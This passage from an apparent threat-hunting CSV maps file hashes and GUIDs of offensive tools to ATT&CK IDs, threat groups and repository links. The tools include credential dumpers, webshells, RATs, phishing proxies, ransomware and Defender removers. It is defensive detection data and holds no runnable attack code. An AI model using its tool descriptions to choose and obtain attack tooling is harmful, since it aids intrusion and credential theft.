Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24236" "*3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d*",".{0,1000}3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24237" "*313624d826ed99d5bb9dce9401b5459c57addec56744a917516aae5a683d6c44*",".{0,1000}313624d826ed99d5bb9dce9401b5459c57addec56744a917516aae5a683d6c44.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24239" "*313a44aa4708001af16cf83b3bcd98fdc20c0ac0f5d9062a1541a498b085b978*",".{0,1000}313a44aa4708001af16cf83b3bcd98fdc20c0ac0f5d9062a1541a498b085b978.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24240" "*313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df*",".{0,1000}313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24241" "*3140428b83a45c63384cb4929316ac23dd8ca006a7b8ce4efd97f88f45e85d9b*",".{0,1000}3140428b83a45c63384cb4929316ac23dd8ca006a7b8ce4efd97f88f45e85d9b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24243" "*3141b56aedfc8fafa19b406b904264a35451008ce5cdc4cff6255f25ea77591c*",".{0,1000}3141b56aedfc8fafa19b406b904264a35451008ce5cdc4cff6255f25ea77591c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24244" "*3142704750b73f299cc6a726fdf3c7ae1e7c75ea8f62769a36072488b23651c4*",".{0,1000}3142704750b73f299cc6a726fdf3c7ae1e7c75ea8f62769a36072488b23651c4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24246" "*314bf9a5bd1f5d13c2dbc28f52e22e401c5216ad5071e5bf46de4b93d882c72f*",".{0,1000}314bf9a5bd1f5d13c2dbc28f52e22e401c5216ad5071e5bf46de4b93d882c72f.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","24248" "*3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac*",".{0,1000}3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24250" "*315bb4e894fc10642514693e365e7a5f6df0e0c12b21c392aa983da5c8c49974*",".{0,1000}315bb4e894fc10642514693e365e7a5f6df0e0c12b21c392aa983da5c8c49974.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24252" "*315C301F-E392-4F7D-9108-8E621C11D662*",".{0,1000}315C301F\-E392\-4F7D\-9108\-8E621C11D662.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24253" "*315edea7f4235f5a8c3ca70bacb414e4694e963f41df5c367aa7a0448581ff56*",".{0,1000}315edea7f4235f5a8c3ca70bacb414e4694e963f41df5c367aa7a0448581ff56.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24254" "*316511d5905a2222abfe317a2fb937588825fe29231c5b122ab790966c3a36bc*",".{0,1000}316511d5905a2222abfe317a2fb937588825fe29231c5b122ab790966c3a36bc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24255" "*3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6*",".{0,1000}3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24257" 
"*3176f76d36507132d3356898ae0823d34e9deeb1af3187ac7645922a0509cda9*",".{0,1000}3176f76d36507132d3356898ae0823d34e9deeb1af3187ac7645922a0509cda9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24259" "*3177334ae8eb2317c5e0775b05a002a43360a76dea4d068d35f9c271c1499408*",".{0,1000}3177334ae8eb2317c5e0775b05a002a43360a76dea4d068d35f9c271c1499408.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24260" "*3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39*",".{0,1000}3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24261" "*31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35*",".{0,1000}31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35.{0,1000}","offensive_tool_keyword","evilginx2","Standalone 
man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24262" "*3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8*",".{0,1000}3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24263" "*3188b14bc09838bf33b57704649237b1c1d343189edaf142cfcf9608c4a41e5d*",".{0,1000}3188b14bc09838bf33b57704649237b1c1d343189edaf142cfcf9608c4a41e5d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24264" "*318c7820d295ab78772ec8424dfc4e0a9619d81ea56ab4df81236f1a42707c97*",".{0,1000}318c7820d295ab78772ec8424dfc4e0a9619d81ea56ab4df81236f1a42707c97.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24265" 
"*318de1de99b98b45fc0af84a0ee30ae88e3d3b44016e460696b1b095525ba382*",".{0,1000}318de1de99b98b45fc0af84a0ee30ae88e3d3b44016e460696b1b095525ba382.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24266" "*319040bad23d4d4c36c6db35f2d44650aba8ef3e34652f3a39bb383cf6f988db*",".{0,1000}319040bad23d4d4c36c6db35f2d44650aba8ef3e34652f3a39bb383cf6f988db.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24267" "*319895b096e8bd0d034246c8b7f11b067fc54831451f14d77d04f9b9c50818bc*",".{0,1000}319895b096e8bd0d034246c8b7f11b067fc54831451f14d77d04f9b9c50818bc.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","24268" "*319d36ae7ed7260c42b1ce5a90c73bfbcaf35ad9e63326547ec6b20e3cecb9cb*",".{0,1000}319d36ae7ed7260c42b1ce5a90c73bfbcaf35ad9e63326547ec6b20e3cecb9cb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24271" "*319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae*",".{0,1000}319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24272" "*31a743113d28136e8facd24ed8fac8bb73fdf70a07a4451bb6aff3b2e648fd38*",".{0,1000}31a743113d28136e8facd24ed8fac8bb73fdf70a07a4451bb6aff3b2e648fd38.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","24273" "*31a854dd758df379bdccbc630737a0e81e7f751e8dfa9d6d18e27a415add3c85*",".{0,1000}31a854dd758df379bdccbc630737a0e81e7f751e8dfa9d6d18e27a415add3c85.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24274" "*31a97e6377d69a3ae7974a441d52657d200210087bfcac7f0c4f79dddf9f488b*",".{0,1000}31a97e6377d69a3ae7974a441d52657d200210087bfcac7f0c4f79dddf9f488b.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","24275" "*31abb963d6b98c0d5068bb32c6d13c98694a45a4cd9af738b215d7ff96944140*",".{0,1000}31abb963d6b98c0d5068bb32c6d13c98694a45a4cd9af738b215d7ff96944140.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","24277" "*31ad473e63f8dab709b9b7a772cbd9a33e66d7f3510aa6fc261003e17040ed1f*",".{0,1000}31ad473e63f8dab709b9b7a772cbd9a33e66d7f3510aa6fc261003e17040ed1f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24278" "*31afc2becc2f46a5f993745e453b13146ca804c48eab0c5b41ba859286cad77a*",".{0,1000}31afc2becc2f46a5f993745e453b13146ca804c48eab0c5b41ba859286cad77a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24279" "*31afdc793da401fdfbe73addfab29166c47ff9c9e39a82661f621ca43a79c6c4*",".{0,1000}31afdc793da401fdfbe73addfab29166c47ff9c9e39a82661f621ca43a79c6c4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24280" "*31b32d51b5a7d8cd0ca07b410bb0bfd0ff95a92572789788c14b144feb1486c2*",".{0,1000}31b32d51b5a7d8cd0ca07b410bb0bfd0ff95a92572789788c14b144feb1486c2.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24281" "*31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80*",".{0,1000}31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24282" 
"*31ba179b08e80d07e8bfad5c7eb4e1a68a7ccfe81735e4807257c847b5478d6d*",".{0,1000}31ba179b08e80d07e8bfad5c7eb4e1a68a7ccfe81735e4807257c847b5478d6d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24283" "*31ba44f9696e84b64506a11c691d123f3298d7de9c9be6ed786cb1258518a45a*",".{0,1000}31ba44f9696e84b64506a11c691d123f3298d7de9c9be6ed786cb1258518a45a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24284" "*31bd80a4afc0f06bce365a02b6035e55d7a13d2e9c949b4d401133a4deef5c40*",".{0,1000}31bd80a4afc0f06bce365a02b6035e55d7a13d2e9c949b4d401133a4deef5c40.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","24286" "*31bec1471840a741ead2128106a98746d4b346a7bfd737579dcc088d31b00eb5*",".{0,1000}31bec1471840a741ead2128106a98746d4b346a7bfd737579dcc088d31b00eb5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24287" 
"*31c88d5ad49ee789d4905d5555adf6352e22acb5e8dfb62866247af7ac9525b3*",".{0,1000}31c88d5ad49ee789d4905d5555adf6352e22acb5e8dfb62866247af7ac9525b3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24290" "*31d41c42dc9bad6dc8dbcf7c232d690e672ffd9c3c08a7fb5c40766d8a043026*",".{0,1000}31d41c42dc9bad6dc8dbcf7c232d690e672ffd9c3c08a7fb5c40766d8a043026.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24291" "*31da885ad54c3557157849781dcca4056bd8594c5551114f1eb7b43f704692dc*",".{0,1000}31da885ad54c3557157849781dcca4056bd8594c5551114f1eb7b43f704692dc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24292" "*31dac83a82cc54324ac27d4754ed64a5ce454d8d85dfd8d2690da656ff7b304c*",".{0,1000}31dac83a82cc54324ac27d4754ed64a5ce454d8d85dfd8d2690da656ff7b304c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24293" 
"*31ea6e085e202e97d79ce006e683f3bdb29e557899a52f6f284e40b86d434fb6*",".{0,1000}31ea6e085e202e97d79ce006e683f3bdb29e557899a52f6f284e40b86d434fb6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24295" "*31ee7ee1add800239003806829b825cadc5b95797c11e33cf6b691571c1e2069*",".{0,1000}31ee7ee1add800239003806829b825cadc5b95797c11e33cf6b691571c1e2069.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A","24296" "*31f63c6923ddd1a842839f7ef1d54fec535f94760d89f0a90ad83a19dc906a8c*",".{0,1000}31f63c6923ddd1a842839f7ef1d54fec535f94760d89f0a90ad83a19dc906a8c.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","24297" "*31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf*",".{0,1000}31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24301" "*3203466ca861519109bd827fc930867acd7062c4f2171eebd4b3c21f1632454b*",".{0,1000}3203466ca861519109bd827fc930867acd7062c4f2171eebd4b3c21f1632454b.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash 